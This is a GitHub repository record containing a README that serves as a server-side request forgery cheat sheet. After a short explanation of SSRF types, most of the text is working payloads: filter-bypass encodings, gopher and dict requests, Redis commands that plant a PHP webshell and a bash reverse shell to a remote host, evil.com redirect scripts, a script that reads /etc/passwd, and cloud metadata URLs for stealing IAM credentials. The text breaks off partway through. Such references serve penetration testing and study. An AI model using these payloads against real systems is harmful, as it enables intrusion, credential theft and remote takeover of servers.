{"id":22559934,"url":"https://github.com/paulveillard/cybersecurity-ssrf","last_synced_at":"2025-10-08T21:15:38.701Z","repository":{"id":109659009,"uuid":"459271170","full_name":"paulveillard/cybersecurity-ssrf","owner":"paulveillard","description":" An ongoing \u0026 curated collection of awesome web vulnerability - Server-side request forgery software practices and remediation, libraries and frameworks, best guidelines and technical resources about SSRF","archived":false,"fork":false,"pushed_at":"2022-02-22T01:07:58.000Z","size":1196,"stargazers_count":17,"open_issues_count":0,"forks_count":2,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-04-10T09:38:29.878Z","etag":null,"topics":["cybersecurity","mitigation","remediation","security","security-tools","server-side","server-side-request-forgery","ssrf","vulnerabilities","vulnerability","vulnerability-assessment","vulnerability-detection","vulnerability-management"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/paulveillard.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":"code-of-conduct.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-02-14T18:04:25.000Z","updated_at":"2025-02-22T11:47:14.000Z","dependencies_parsed_at":"2023-04-28T10:46:13.603Z","dependency_job_id":null,"html_url":"https://github.com/paulveillard/cybersecurity-ssrf","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/paulveillard/cybersecurity-ssrf","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/paulveillard%2Fcybersecurity-ssrf","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/paulveillard%2Fcybersecurity-ssrf/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/paulveillard%2Fcybersecurity-ssrf/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/paulveillard%2Fcybersecurity-ssrf/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/paulveillard","download_url":"https://codeload.github.com/paulveillard/cybersecurity-ssrf/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/paulveillard%2Fcybersecurity-ssrf/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":271887734,"owners_count":24839137,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-24T02:00:11.135Z","response_time":111,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cybersecurity","mitigation","remediation","security","security-tools","server-side","server-side-request-forgery","ssrf","vulnerabilities","vulnerability","vulnerability-assessment","vulnerability-detection","vulnerability-management"],"created_at":"2024-12-07T21:10:10.722Z","updated_at":"2025-10-08T21:15:33.651Z","avatar_url":"https://github.com/paulveillard.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Server-Side Request Forgery (SSRF)\n\u003e An ongoing \u0026 curated collection of awesome web vulnerability - Server-side request forgery software practices and remediation, libraries and frameworks, best guidelines and technical resources about SSRF.\n\n## `What is Server Side Request Forgery (SSRF)?`\n- [A Server-Side Request Forgery (SSRF)](https://en.wikipedia.org/wiki/Server-side_request_forgery) attack involves an attacker abusing server functionality to access or modify resources. \n\n ![attacker](https://github.com/paulveillard/cybersecurity-ssrf/blob/main/img/server-side-request-forgery.png)\n \nThe attacker targets an application that supports data imports from URLs or allows them to read data from URLs. URLs can be manipulated, either by replacing them with new ones or by tampering with URL path traversal.\n\n- Typically, attackers supply a URL (or modify an existing one) and the code running on the server reads or submits data to it. Attackers can leverage URLs to gain access to internal data and services that were not meant to be exposed – including HTTP-enabled databases and server configuration data.\n\n- Once an attacker has tampered with the request, the server receives it and attempts to read data to the altered URL. Even for services that aren’t exposed directly on the public internet, attackers can select a target URL, which enables them to read the data.\n\n\n## `Types Of SSRF :`\n### 1. Blind SSRF: \nIn a Blind SSRF,  attacker are not able to control the data of  packet B  that are sent to the application in a trusted internal network. Here attacker can control the IP address and ports of server. To exploit this type of SSRF we have to feed URL followed by the colon and port number, by observing responses and error messages from the server we can find the open and close ports of server.We have try this procedure for the different ports to check their status.\n```\nExample :\n\nhttp://example.com:1337\nhttp://example.com:9923\nhttp://example.com:43\nhttp://example.com:22\n```\n\n![blind](https://github.com/paulveillard/cybersecurity-ssrf/blob/main/img/Blind-SSRF.png)\n\n### 2. Limited Response / Partial SSRF :\nIn this type of SSRF we get limited response from the server like title of the page or got access to resources but can’t see the data. We can control only certain parts of packet B that arrive internal application this type of vulnerability can be used to read local system files such as /etc/config, /etc/hosts, etc/passwd and many others. By using file:// protocol we can read file on the system.In some cases  XXE injection ,DDos these type of vulnerability may useful be exploit Partial SSRF Vulnerability.\n\n```\nExample :\n\nfile:///etc/hosts\nfile:///etc/config\nfile:///etc/passwd\n```\n\n### 3. Full Response SSRF :\nIn Full SSRF we have complete control over the Packet B (shown in fig). Now we can access the services running of the internal network and find the vulnerabilities in internal network. In this type of SSRF we can use the protocols like file://, dict://, http://, gopher://, etc. here we have large scope of creating different request and exploit the internal network if any vulnerabilities are present. Full SSRF vulnerability may cause the application crash through buffer overflow, by sending large string in the request causes the buffer overflow.\n\n```\nExample :\n\nhttp://192.168.1.8/BBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\nBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\n```\n\n## Potential Blocks During Testing SSRF Vulnerability :\n\nWhitelisting : Server only allows the few domain name to be used in the request , server has a white list of domain if domain name from that list matches with domain name from request then only accept the request otherwise server decline the request.\nBlacklisting:-Server discard the all the request containing IP addresses, domain names, keywords from the blacklist of server.\nRestricted content:- Server allows to access only particular amount of files to user, it allows only the few file extension types for public access.\n\n\n## Key Points To Test SSRF Vulnerability :\n\n1. Always make sure that you are making request to back end server on the behalf of public server not from the browser.\n2. To fetch the data from server also try http://localhost/xyz/  with the http://127.0.0.1/xyz.\n3. Server may have the firewall protection always try to bypass the firewall if possible.\n4. Make sure that request is coming from server not from your local host.\n\n\n\n# Server-Side Request Forgery\n\n\u003e Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.\n\n## Table of Contents\n* [Introduction](#server-side-request-forgery-ssrf)\n* [Tools](#tools)\n* [Payloads with localhost](#payloads-with-localhost)\n* [Bypassing filters](#bypassing-filters)\n  * [Bypass using HTTPS](#bypass-using-https)\n  * [Bypass localhost with [::]](#bypass-localhost-with-)\n  * [Bypass localhost with a domain redirection](#bypass-localhost-with-a-domain-redirection)\n  * [Bypass localhost with CIDR](#bypass-localhost-with-cidr)\n  * [Bypass using a decimal IP location](#bypass-using-a-decimal-ip-location)\n  * [Bypass using octal IP](#bypass-using-octal-ip)\n  * [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6ipv4-address-embedding)\n  * [Bypass using malformed urls](#bypass-using-malformed-urls)\n  * [Bypass using rare address](#bypass-using-rare-address)\n  * [Bypass using URL encoding](#bypass-using-url-encoding)\n  * [Bypass using bash variables](#bypass-using-bash-variables)\n  * [Bypass using tricks combination](#bypass-using-tricks-combination)\n  * [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics)\n  * [Bypass filter_var() php function](#bypass-filter_var-php-function)\n  * [Bypass against a weak parser](#bypass-against-a-weak-parser)\n  * [Bypassing using jar protocol (java only)](#bypassing-using-jar-protocol-java-only)\n* [SSRF exploitation via URL Scheme](#ssrf-exploitation-via-url-scheme)\n  * [file://](#file)\n  * [http://](#http)\n  * [dict://](#dict)\n  * [sftp://](#sftp)\n  * [tftp://](#tftp)\n  * [ldap://](#ldap)\n  * [gopher://](#gopher)\n  * [netdoc://](#netdoc)\n* [SSRF exploiting WSGI](#ssrf-exploiting-wsgi)\n* [SSRF exploiting Redis](#ssrf-exploiting-redis)\n* [SSRF exploiting PDF file](#ssrf-exploiting-pdf-file)\n* [Blind SSRF](#blind-ssrf)\n* [SSRF to XSS](#ssrf-to-xss)\n* [SSRF from XSS](#ssrf-from-xss)\n* [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)\n  * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)\n  * [SSRF URL for AWS ECS](#ssrf-url-for-aws-ecs)\n  * [SSRF URL for AWS Elastic Beanstalk](#ssrf-url-for-aws-elastic-beanstalk)\n  * [SSRF URL for AWS Lambda](#ssrf-url-for-aws-lambda)\n  * [SSRF URL for Google Cloud](#ssrf-url-for-google-cloud)\n  * [SSRF URL for Digital Ocean](#ssrf-url-for-digital-ocean)\n  * [SSRF URL for Packetcloud](#ssrf-url-for-packetcloud)\n  * [SSRF URL for Azure](#ssrf-url-for-azure)\n  * [SSRF URL for OpenStack/RackSpace](#ssrf-url-for-openstackrackspace)\n  * [SSRF URL for HP Helion](#ssrf-url-for-hp-helion)\n  * [SSRF URL for Oracle Cloud](#ssrf-url-for-oracle-cloud)\n  * [SSRF URL for Kubernetes ETCD](#ssrf-url-for-kubernetes-etcd)\n  * [SSRF URL for Alibaba](#ssrf-url-for-alibaba)\n  * [SSRF URL for Docker](#ssrf-url-for-docker)\n  * [SSRF URL for Rancher](#ssrf-url-for-rancher)\n\n## `Tools`\n\n- [SSRFmap - https://github.com/swisskyrepo/SSRFmap](https://github.com/swisskyrepo/SSRFmap)\n- [Gopherus - https://github.com/tarunkant/Gopherus](https://github.com/tarunkant/Gopherus)\n- [See-SURF - https://github.com/In3tinct/See-SURF](https://github.com/In3tinct/See-SURF)\n- [SSRF Sheriff - https://github.com/teknogeek/ssrf-sheriff](https://github.com/teknogeek/ssrf-sheriff)\n\n## `Payloads with localhost`\n\nBasic SSRF v1\n\n```powershell\nhttp://127.0.0.1:80\nhttp://127.0.0.1:443\nhttp://127.0.0.1:22\nhttp://0.0.0.0:80\nhttp://0.0.0.0:443\nhttp://0.0.0.0:22\n```\n\nBasic SSRF - Alternative version\n\n```powershell\nhttp://localhost:80\nhttp://localhost:443\nhttp://localhost:22\n```\n\n## `Bypassing filters`\n\n### Bypass using HTTPS\n\n```powershell\nhttps://127.0.0.1/\nhttps://localhost/\n```\n\n### Bypass localhost with [::]\n\n```powershell\nhttp://[::]:80/\nhttp://[::]:25/ SMTP\nhttp://[::]:22/ SSH\nhttp://[::]:3128/ Squid\n```\n\n```powershell\nhttp://0000::1:80/\nhttp://0000::1:25/ SMTP\nhttp://0000::1:22/ SSH\nhttp://0000::1:3128/ Squid\n```\n\n### Bypass localhost with a domain redirection\n\n```powershell\nhttp://spoofed.burpcollaborator.net\nhttp://localtest.me\nhttp://customer1.app.localhost.my.company.127.0.0.1.nip.io\nhttp://mail.ebc.apple.com redirect to 127.0.0.6 == localhost\nhttp://bugbounty.dod.network redirect to 127.0.0.2 == localhost\n```\n\nThe service nip.io is awesome for that, it will convert any ip address as a dns.\n\n```powershell\nNIP.IO maps \u003canything\u003e.\u003cIP Address\u003e.nip.io to the corresponding \u003cIP Address\u003e, even 127.0.0.1.nip.io maps to 127.0.0.1\n```\n\n### Bypass localhost with CIDR \n\nIt's a /8\n\n```powershell\nhttp://127.127.127.127\nhttp://127.0.1.3\nhttp://127.0.0.0\n```\n\n### Bypass using a decimal IP location\n\n```powershell\nhttp://2130706433/ = http://127.0.0.1\nhttp://3232235521/ = http://192.168.0.1\nhttp://3232235777/ = http://192.168.1.1\nhttp://2852039166/  = http://169.254.169.254\n```\n\n### Bypass using octal IP\n\nImplementations differ on how to handle octal format of ipv4.\n\n```sh\nhttp://0177.0.0.1/ = http://127.0.0.1\nhttp://o177.0.0.1/ = http://127.0.0.1\nhttp://0o177.0.0.1/ = http://127.0.0.1\nhttp://q177.0.0.1/ = http://127.0.0.1\n...\n```\n\nRef: \n- [DEFCON 29-KellyKaoudis SickCodes-Rotten code, aging standards \u0026 pwning IPv4 parsing](https://www.youtube.com/watch?v=_o1RPJAe4kU)\n- [AppSecEU15-Server_side_browsing_considered_harmful.pdf](https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)\n\n\n### Bypass using IPv6/IPv4 Address Embedding\n\n[IPv6/IPv4 Address Embedding](http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm)\n\n```powershell\nhttp://[0:0:0:0:0:ffff:127.0.0.1]\n```\n\n### Bypass using malformed urls\n\n```powershell\nlocalhost:+11211aaa\nlocalhost:00011211aaaa\n```\n\n### Bypass using rare address\n\nYou can short-hand IP addresses by dropping the zeros\n\n```powershell\nhttp://0/\nhttp://127.1\nhttp://127.0.1\n```\n\n### Bypass using URL encoding\n\n[Single or double encode a specific URL to bypass blacklist](https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter)\n\n```powershell\nhttp://127.0.0.1/%61dmin\nhttp://127.0.0.1/%2561dmin\n```\n\n### Bypass using bash variables \n\n(curl only)\n\n```powershell\ncurl -v \"http://evil$google.com\"\n$google = \"\"\n```\n\n### Bypass using tricks combination\n\n```powershell\nhttp://1.1.1.1 \u0026@2.2.2.2# @3.3.3.3/\nurllib2 : 1.1.1.1\nrequests + browsers : 2.2.2.2\nurllib : 3.3.3.3\n```\n\n### Bypass using enclosed alphanumerics \n\n[@EdOverflow](https://twitter.com/EdOverflow)\n\n```powershell\nhttp://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com\n\nList:\n① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿\n```\n\n### Bypass filter_var() php function\n\n```powershell\n0://evil.com:80;http://google.com:80/ \n```\n\n### Bypass against a weak parser\n\nby Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf))\n\n```powershell\nhttp://127.1.1.1:80\\@127.2.2.2:80/\nhttp://127.1.1.1:80\\@@127.2.2.2:80/\nhttp://127.1.1.1:80:\\@@127.2.2.2:80/\nhttp://127.1.1.1:80#\\@127.2.2.2:80/\n```\n\n![https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.png?raw=true](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/WeakParser.jpg?raw=true)\n\n### Bypassing using a redirect\n[using a redirect](https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection)\n\n```powershell\n1. Create a page on a whitelisted host that redirects requests to the SSRF the target URL (e.g. 192.168.0.1)\n2. Launch the SSRF pointing to  vulnerable.com/index.php?url=http://YOUR_SERVER_IP\nvulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1\n```\n\n### Bypassing using type=url\n\n```powershell\nChange \"type=file\" to \"type=url\"\nPaste URL in text field and hit enter\nUsing this vulnerability users can upload images from any image URL = trigger an SSRF\n```\n\n### Bypassing using DNS Rebinding (TOCTOU)\n\n```powershell\nCreate a domain that change between two IPs. http://1u.ms/ exists for this purpose.\nFor example to rotate between 1.2.3.4 and 169.254-169.254, use the following domain:\nmake-1.2.3.4-rebind-169.254-169.254-rr.1u.ms\n```\n\n### Bypassing using jar protocol (java only)\n\nBlind SSRF\n\n```powershell\njar:scheme://domain/path!/ \njar:http://127.0.0.1!/\njar:https://127.0.0.1!/\njar:ftp://127.0.0.1!/\n```\n\n## SSRF exploitation via URL Scheme\n\n### File \n\nAllows an attacker to fetch the content of a file on the server\n\n```powershell\nfile://path/to/file\nfile:///etc/passwd\nfile://\\/\\/etc/passwd\nssrf.php?url=file:///etc/passwd\n```\n\n### HTTP\n\nAllows an attacker to fetch any content from the web, it can also be used to scan ports.\n\n```powershell\nssrf.php?url=http://127.0.0.1:22\nssrf.php?url=http://127.0.0.1:80\nssrf.php?url=http://127.0.0.1:443\n```\n\n![SSRF stream](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/Images/SSRF_stream.png?raw=true)\n\nThe following URL scheme can be used to probe the network\n\n### Dict\n\nThe DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:\n\n```powershell\ndict://\u003cuser\u003e;\u003cauth\u003e@\u003chost\u003e:\u003cport\u003e/d:\u003cword\u003e:\u003cdatabase\u003e:\u003cn\u003e\nssrf.php?url=dict://attacker:11111/\n```\n\n### SFTP \n\nA network protocol used for secure file transfer over secure shell\n\n```powershell\nssrf.php?url=sftp://evil.com:11111/\n```\n\n### TFTP\n\nTrivial File Transfer Protocol, works over UDP\n\n```powershell\nssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET\n```\n\n### LDAP\n\nLightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service.\n\n```powershell\nssrf.php?url=ldap://localhost:11211/%0astats%0aquit\n```\n\n### Gopher\n\n```powershell\nssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a\n\nwill make a request like\nHELO localhost\nMAIL FROM:\u003chacker@site.com\u003e\nRCPT TO:\u003cvictim@site.com\u003e\nDATA\nFrom: [Hacker] \u003chacker@site.com\u003e\nTo: \u003cvictime@site.com\u003e\nDate: Tue, 15 Sep 2017 17:20:26 -0400\nSubject: Ah Ah AH\n\nYou didn't say the magic word !\n\n\n.\nQUIT\n```\n\n#### Gopher HTTP\n\n```powershell\ngopher://\u003cproxyserver\u003e:8080/_GET http://\u003cattacker:80\u003e/x HTTP/1.1%0A%0A\ngopher://\u003cproxyserver\u003e:8080/_POST%20http://\u003cattacker\u003e:80/x%20HTTP/1.1%0ACookie:%20eatme%0A%0AI+am+a+post+body\n```\n\n#### Gopher SMTP - Back connect to 1337\n\n```php\nContent of evil.com/redirect.php:\n\u003c?php\nheader(\"Location: gopher://hack3r.site:1337/_SSRF%0ATest!\");\n?\u003e\n\nNow query it.\nhttps://example.com/?q=http://evil.com/redirect.php.\n```\n\n#### Gopher SMTP - send a mail\n\n```php\nContent of evil.com/redirect.php:\n\u003c?php\n        $commands = array(\n                'HELO victim.com',\n                'MAIL FROM: \u003cadmin@victim.com\u003e',\n                'RCPT To: \u003csxcurity@oou.us\u003e',\n                'DATA',\n                'Subject: @sxcurity!',\n                'Corben was here, woot woot!',\n                '.'\n        );\n\n        $payload = implode('%0A', $commands);\n\n        header('Location: gopher://0:25/_'.$payload);\n?\u003e\n```\n\n### Netdoc\n\nWrapper for Java when your payloads struggle with \"\\n\" and \"\\r\" characters.\n\n```powershell\nssrf.php?url=netdoc:///etc/passwd\n``` \n\n## SSRF exploiting WSGI\n\nExploit using the Gopher protocol, full exploit script available at https://github.com/wofeiwo/webcgi-exploits/blob/master/python/uwsgi_exp.py.\n\n```powershell\ngopher://localhost:8000/_%00%1A%00%00%0A%00UWSGI_FILE%0C%00/tmp/test.py\n```\n\n| Header    |           |             |\n|-----------|-----------|-------------|\n| modifier1 | (1 byte)  | 0 (%00)     |\n| datasize  | (2 bytes) | 26 (%1A%00) |\n| modifier2 | (1 byte)  | 0 (%00)     |\n\n| Variable (UWSGI_FILE) |           |    |            |   |\n|-----------------------|-----------|----|------------|---|\n| key length            | (2 bytes) | 10 | (%0A%00)   |   |\n| key data              | (m bytes) |    | UWSGI_FILE |   |\n| value length          | (2 bytes) | 12 | (%0C%00)   |   |\n| value data            | (n bytes) |    | /tmp/test.py   |   |\n\t\n\n## SSRF exploiting Redis\n\n\u003e Redis is a database system that stores everything in RAM\n\n```powershell\n# Getting a webshell\nurl=dict://127.0.0.1:6379/CONFIG%20SET%20dir%20/var/www/html\nurl=dict://127.0.0.1:6379/CONFIG%20SET%20dbfilename%20file.php\nurl=dict://127.0.0.1:6379/SET%20mykey%20\"\u003c\\x3Fphp system($_GET[0])\\x3F\u003e\"\nurl=dict://127.0.0.1:6379/SAVE\n\n# Getting a PHP reverse shell\ngopher://127.0.0.1:6379/_config%20set%20dir%20%2Fvar%2Fwww%2Fhtml\ngopher://127.0.0.1:6379/_config%20set%20dbfilename%20reverse.php\ngopher://127.0.0.1:6379/_set%20payload%20%22%3C%3Fphp%20shell_exec%28%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FREMOTE_IP%2FREMOTE_PORT%200%3E%261%27%29%3B%3F%3E%22\ngopher://127.0.0.1:6379/_save\n```\n\n## SSRF exploiting PDF file\n\n![https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Server%20Side%20Request%20Forgery/Images/SSRF_PDF.png](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Server%20Side%20Request%20Forgery/Images/SSRF_PDF.png)\n\nExample with [WeasyPrint by @nahamsec](https://www.youtube.com/watch?v=t5fB6OZsR6c\u0026feature=emb_title)\n\n```powershell\n\u003clink rel=attachment href=\"file:///root/secret.txt\"\u003e\n```\n\nExample with PhantomJS \n\n```js\n\u003cscript\u003e\n    exfil = new XMLHttpRequest();\n    exfil.open(\"GET\",\"file:///etc/passwd\");\n    exfil.send();\n    exfil.onload = function(){document.write(this.responseText);}\n    exfil.onerror = function(){document.write('failed!')}\n\u003c/script\u003e\n```\n\n## Blind SSRF\n\n\u003e When exploiting server-side request forgery, we can often find ourselves in a position where the response cannot be read. \n\nUse an SSRF chain to gain an Out-of-Band output.\n\nFrom https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/ / https://github.com/assetnote/blind-ssrf-chains\n\n**Possible via HTTP(s)**\n- [Elasticsearch](https://github.com/assetnote/blind-ssrf-chains#elasticsearch)\n- [Weblogic](https://github.com/assetnote/blind-ssrf-chains#weblogic)\n- [Hashicorp Consul](https://github.com/assetnote/blind-ssrf-chains#consul)\n- [Shellshock](https://github.com/assetnote/blind-ssrf-chains#shellshock)\n- [Apache Druid](https://github.com/assetnote/blind-ssrf-chains#druid)\n- [Apache Solr](https://github.com/assetnote/blind-ssrf-chains#solr)\n- [PeopleSoft](https://github.com/assetnote/blind-ssrf-chains#peoplesoft)\n- [Apache Struts](https://github.com/assetnote/blind-ssrf-chains#struts)\n- [JBoss](https://github.com/assetnote/blind-ssrf-chains#jboss)\n- [Confluence](https://github.com/assetnote/blind-ssrf-chains#confluence)\n- [Jira](https://github.com/assetnote/blind-ssrf-chains#jira)\n- [Other Atlassian Products](https://github.com/assetnote/blind-ssrf-chains#atlassian-products)\n- [OpenTSDB](https://github.com/assetnote/blind-ssrf-chains#opentsdb)\n- [Jenkins](https://github.com/assetnote/blind-ssrf-chains#jenkins)\n- [Hystrix Dashboard](https://github.com/assetnote/blind-ssrf-chains#hystrix)\n- [W3 Total Cache](https://github.com/assetnote/blind-ssrf-chains#w3)\n- [Docker](https://github.com/assetnote/blind-ssrf-chains#docker)\n- [Gitlab Prometheus Redis Exporter](https://github.com/assetnote/blind-ssrf-chains#redisexporter)\n\n**Possible via Gopher**\n- [Redis](https://github.com/assetnote/blind-ssrf-chains#redis)\n- [Memcache](https://github.com/assetnote/blind-ssrf-chains#memcache)\n- [Apache Tomcat](https://github.com/assetnote/blind-ssrf-chains#tomcat)\n\n\n## SSRF to XSS \n\nby [@D0rkerDevil \u0026 @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)\n\n```bash\nhttp://brutelogic.com.br/poc.svg -\u003e simple alert\nhttps://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= -\u003e simple ssrf\n\nhttps://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg\n```\n\n## SSRF from XSS\n\n### Using an iframe\n\nThe content of the file will be integrated inside the PDF as an image or text.\n\n```html\n\u003cimg src=\"echopwn\" onerror=\"document.write('\u003ciframe src=file:///etc/passwd\u003e\u003c/iframe\u003e')\"/\u003e\n```\n\n### Using an attachment\n\nExample of a PDF attachment using HTML \n\n1. use `\u003clink rel=attachment href=\"URL\"\u003e` as Bio text\n2. use 'Download Data' feature to get PDF\n3. use `pdfdetach -saveall filename.pdf` to extract embedded resource\n4. `cat attachment.bin`\n\n## SSRF URL for Cloud Instances\n\n### SSRF URL for AWS Bucket\n\n[Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)\nInteresting path to look for at `http://169.254.169.254` or `http://instance-data`\n\n```powershell\nAlways here : /latest/meta-data/{hostname,public-ipv4,...}\nUser data (startup script for auto-scaling) : /latest/user-data\nTemporary AWS credentials : /latest/meta-data/iam/security-credentials/\n```\n\nDNS record\n\n```powershell\nhttp://instance-data\nhttp://169.254.169.254\nhttp://169.254.169.254.nip.io/\n```\n\nHTTP redirect\n\n```powershell\nStatic:http://nicob.net/redir6a\nDynamic:http://nicob.net/redir-http-169.254.169.254:80-\n```\n\nAlternate IP encoding\n\n```powershell\nhttp://425.510.425.510/ Dotted decimal with overflow\nhttp://2852039166/ Dotless decimal\nhttp://7147006462/ Dotless decimal with overflow\nhttp://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal\nhttp://0xA9FEA9FE/ Dotless hexadecimal\nhttp://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow\nhttp://0251.0376.0251.0376/ Dotted octal\nhttp://0251.00376.000251.0000376/ Dotted octal with padding\n```\n\nMore urls to include\n\n```powershell\nhttp://169.254.169.254/latest/user-data\nhttp://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]\nhttp://169.254.169.254/latest/meta-data/\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance\nhttp://169.254.169.254/latest/meta-data/ami-id\nhttp://169.254.169.254/latest/meta-data/reservation-id\nhttp://169.254.169.254/latest/meta-data/hostname\nhttp://169.254.169.254/latest/meta-data/public-keys/\nhttp://169.254.169.254/latest/meta-data/public-keys/0/openssh-key\nhttp://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/dummy\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/s3access\nhttp://169.254.169.254/latest/dynamic/instance-identity/document\n```\n\nAWS SSRF Bypasses\n```\nConverted Decimal IP: http://2852039166/latest/meta-data/\nIPV6 Compressed: http://[::ffff:a9fe:a9fe]/latest/meta-data/\nIPV6 Expanded: http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/meta-data/\nIPV6/IPV4: http://[0:0:0:0:0:ffff:169.254.169.254]/latest/meta-data/\n```\n\nE.g: Jira SSRF leading to AWS info disclosure - `https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/metadata/v1/maintenance`\n\nE.g2: Flaws challenge - `http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/`\n\n### SSRF URL for AWS ECS\n\nIf you have an SSRF with file 